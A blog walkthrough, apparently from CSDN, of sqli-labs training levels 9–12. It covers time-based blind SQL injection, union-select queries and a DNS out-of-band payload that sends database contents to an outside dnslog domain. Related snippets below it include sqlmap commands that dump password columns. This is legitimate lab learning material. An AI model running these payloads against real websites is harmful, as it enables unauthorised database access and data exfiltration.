sqli-labs通关攻略(9-12)

最新推荐文章于 2025-12-27 08:36:50 发布
原创 最新推荐文章于 2025-12-27 08:36:50 发布 · 350 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #oracle #github #靶场

less-9

经过尝试发现只有一种页面,可以使用时间盲注和外带注入

时间盲注

利用sleep()函数是否执行来判断构造

通过判断,确认为单引号字符串

?id=1'and if(length((select database()))>7,sleep(3),1)--+

同样利用函数来判断出数据库名长度为8位

判断出第一位ASCII值为115,对应s

?id=1'and if(ascii(substr((select database()),1,1))>114,sleep(3),1)--+

同理可以查询到其他的信息

外带注入

打开dnslog.cn,点击左面按钮获得一个域名

在指令中带上这个域名

?id=1' and (select load_file(concat('\\\\',(select hex(database())),'.域名\\aaa')))%23--+

访问后即可点击右面按钮查看(也可不用hex(),不过尽量使⽤ hex() 函数编码一下,不然可能无法请求

十六进制数7365637572697479对应的英文是"security"

注:如果没有反应在phpstudy_pro\Extensions\MySQL5.7.26\my.ini 文件中添加

secure_file_priv = ''

外带注入更简单一点

less-10

经过尝试,发现没有变换,也没有报错信息,使用时间盲注

尝试后发现为双引号字符型

?id=1" and if(length(database())>8,sleep(3),3)--+

剩余操作同上

?id=1“”and if(ascii(substr((select database()),1,1))>114,sleep(3),1)--+

同样也可以外带注入

less-11

在输入框进行注入类型判断

在username 和passward分别输入'页面均有变化,可知都可能有回显点

输入'#页面无变化,说明是字符型

在框内输入指令

1' union select database(),version()#

即可查询到数据库信息

less-12

输入双引号,可能有回显点

闭合成功

和上一题一样的操作,输入

1") union select database(),version()#

得到信息

sqli-labs通关笔记
m0_67795959的博客
10-23 1246
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 21万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-优快云博客_sql注入数据包 ​...
sqli-labs通关攻略
2302_80982453的博客
02-26 1929
id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+ 查看字段。id=-1') union select 1,2,group_concat(username,'~',password) from users --+ 拿到所有的数据。
sqli-labs通关全详解
Keeping it fresh at all times.
10-08 6780
为探讨清楚SQL注入的诸多细节,我们特以经典的sqli-labs进行从入门到进阶的强化训练。在做题过程中,作者进行了全面、详细、系统的总结,形成了sqli-labs的详细题解。
sqli-labs通关攻略9-12关)
qq_64470109的博客
03-03 1272
时间盲注的原理是利用sleep()函数,根据页面的响应时间来判断我们所输入的代码是否正确。
sqli-labs通关攻略
网安小白
07-22 826
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
sqli-labs靶场通关攻略
test_zpx的博客
08-14 5773
Good Good Study,Day Day Up!
sqli-labs通关攻略(1-4)
2302_77611368的博客
02-26 359
判断是否存在SQL注入输入?id=1页面发生变化,开始判断SQL拼接,字符型还是数字型输入?id=1 and 1=2 --+,数字逻辑为错仍未报错,不为数字型开始尝试字符型,输入?id=1' or 1=2 --+,页面正常,改为输入字符型逻辑判断为错的?页面异常,可知是字符型存在SQL注入漏洞输入?id=1'order by 1--+(判断数据库表是否存在1列,页面有数据,说明存在1列)如果报错即为超过列数通过尝试可知有三列利用联合查询,输入?
sqli-labs通关攻略(5-8)
ljh123321ljh的博客
02-27 1088
limit 0,1查询第一条数据limit 1,1查询第二条数据limit 2,1查询第三条数据limit 3,1查询第四条数据。
sqli-labs通关攻略(16-19关)
qq_64470109的博客
03-04 534
我们在上一篇文章里已经讲过布尔盲注了,所以这里简单的说一说就好了。
sqli-labs注入完全手册:sqli-labs全关卡通关详解与技巧总结
02-24
本书《sqli-labs注入完全手册:sqli-labs全关卡通关详解与技巧总结》提供了对该平台全面而深入的介绍,针对每一个关卡,书中不仅详细解释了注入的原理,还提供了多种解决方案和技巧总结,是学习SQL注入技术不可或缺...
sqli-labs通关记录
03-06
整个sqli-labs通关过程,除了教会如何识别和利用SQL注入漏洞外,还涉及到了数据库系统的相关知识,如SQL语句的构造、数据库函数的运用、布尔盲注和报错注入的技巧等。掌握这些技巧能够帮助开发者更好地了解和防范...
MySQL -复合查询
nplplus的博客
12-24 1170
本文系统介绍了MySQL复合查询的核心操作,从单表基础查询到多表关联查询,再到子查询和合并查询。首先回顾了单表查询中的条件筛选、排序计算和聚合分组等基础操作;然后讲解了多表联查(包括三表联查)和自连接的实现方法;接着详细阐述了子查询的多种应用场景,包括单行、多行子查询和FROM子句中的临时表用法;最后介绍了UNION和UNION ALL合并查询的区别。所有示例均基于经典的员工管理系统(EMP、DEPT、SALGRADE表),配有真实查询结果,建议读者通过实践来掌握这些查询技巧。
点赞系统问题
amdkk的博客
12-26 706
​​:Spring Pulsar 提供的接口,允许通过customize方法深度定制消费者行为。批量接收策略配置。:控制批量消息接收策略maxNumMessages:单次批量拉取多少条信息timeout:超时后触发批量处理。NACK重试策略当消费者调用时触发重试。:消息重投递的退避策略接口。.minDelayMs(1000) // 初始延迟 1 秒 .maxDelayMs(60000) // 最大延迟 60 秒 .multiplier(2) // 指数退避倍数。
多元异构数据库高效运维法则:事前管控+事中处置+事后自愈闭环
weixin_54551388的博客
12-25 611
如果你的团队也在为数据库管理难、运维效率低而困扰,不妨试试zCloud数据库云管平台,让专业的工具为运维减负,让数据库真正成为业务增长的助推器。当数据库套数多、类型杂、架构异并存时,人工配置的疏漏、SQL 语句的隐患、巡检盲区的遗漏,都可能成为影响系统稳定的 “潜在风险”。公司以“数据驱动,成就未来”为使命,致力于将创新的数据技术产品和解决方案带给全球的企业和组织,帮助客户构建安全、高效、敏捷且经济的数据环境,持续增强客户在数据洞察和决策上的竞争优势,实现数据驱动的业务创新和升级发展。
第二篇:Linux服务器性能优化实战技巧(提升稳定性与效率)
最新发布
ybmzlqzj的博客
12-27 288
调整TCP连接超时时间:net.ipv4.tcp_keepalive_time = 600(TCP保持连接的空闲时间,默认7200秒,缩短为10分钟,快速释放无效连接)、net.ipv4.tcp_keepalive_intvl = 30(保持连接探测间隔时间)、net.ipv4.tcp_keepalive_probes = 10(探测失败后重试次数)。使用nice命令调整进程优先级:nice -n -5 ./app(启动app进程,设置优先级为-5,nice值范围-20~19,值越小优先级越高)。
计算机毕业设计|基于springboot + vue健康茶饮销售管理系统(源码+数据库+文档)
12-24 815
本文介绍了基于SpringBoot+Vue的健康茶饮销售管理系统开发。系统采用前后端分离架构,后端使用SpringBoot框架简化配置,前端采用Vue实现组件化开发,数据库选用MySQL。文章详细说明了系统设计原则、技术选型理由,并提供了代码示例和测试案例。系统功能完整,包含商品管理、用户认证等模块,通过严格测试确保安全性。文末附有源码获取方式和最新毕设选题推荐,适合作为计算机专业学生的项目参考。
无响应的状态码分析
Vincent0sen的博客
12-24 406
Langflow 处理某些 Flow 时,如果调用了底层的 C++ 库(如向量数据库 Chroma、Faiss 或某些 Transformer 算子),由于版本不兼容或内存非法访问,Python 解释器会直接**“闪崩”**。如果你的请求体(Payload)非常大,或者包含了某些可能被误认为攻击的特殊字符,本地的防火墙或安全软件可能会在连接中途强制注入一个 RST 包断开连接。如果 postgres 容器响应极慢,或者 SQLAlchemy 在某些极端并发下导致主线程挂起并超时断开连接,也可能出现此错误。
sqli-labs通关sqlmap
12-21
使用sqlmap通关sqli - labs可按如下方法与步骤操作: #### 确定目标URL和请求参数 依据不同关卡,明确目标URL以及对应的请求参数。例如,在第14关,目标URL为 `http://192.168.2.16/sqli-labs/Less-14/`,请求参数为 `uname=1&passwd=1&submit=Submit`;在第8关,目标URL是 `http://192.168.106.129/sqli-labs-master/Less-8/?id=1` ;在Less - 1下目标URL是 `http://localhost:8888/Less-1/?id=1`[^1][^4][^5]。 #### 调用sqlmap并设置参数 利用不同的参数来开展各种操作,以下是常见操作及对应的示例命令: ##### 探测数据库名 运行 `sqlmap -u <目标URL> --batch --dbs` 来获取所有数据库名。如第20关,可使用 `sqlmap -url "http://192.168.0.107/sqli-labs/Less-20/index.php" --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3"` 命令 [^2]。 ##### 获取指定数据库中的数据表名 执行 `python sqlmap.py -u <目标URL> --batch -D <数据库名> --tables` 命令。例如,获取 `security` 数据库中的数据表名,可使用 `python sqlmap.py -u http://192.168.106.129/sqli-labs-master/Less-8/?id=1 --batch -D security --tables` [^4]。 ##### 查找指定表下的所有字段 使用 `python sqlmap.py -u <目标URL> -D "<数据库名>" -T "<表名>" --columns` 命令。例如,爆出 `users` 表下的所有字段,可运行 `python sqlmap.py -u http://localhost:8888/Less-1/?id=1 -D "security" -T "users" --columns` [^5]。 ##### 爆字段内容 执行 `sqlmap -u <目标URL> --batch --thread=5 -D <数据库名> -T <表名> -C <字段名> --dump` 命令。例如,爆 `security` 数据库中 `users` 表的 `password` 字段内容,命令为 `sqlmap -u http://192.168.79.1/sqli-labs/Less-1?id=1 --batch --thread=5 -D security -T users -C password --dump` [^3]。 实例代码如下: ```bash # 探测数据库名 sqlmap -u http://192.168.0.107/sqli-labs/Less-20/index.php --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3 # 获取指定数据库中的数据表名 python sqlmap.py -u http://192.168.106.129/sqli-labs-master/Less-8/?id=1 --batch -D security --tables # 查找指定表下的所有字段 python sqlmap.py -u http://localhost:8888/Less-1/?id=1 -D "security" -T "users" --columns # 爆字段内容 sqlmap -u http://192.168.79.1/sqli-labs/Less-1?id=1 --batch --thread=5 -D security -T users -C password --dump ``` ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值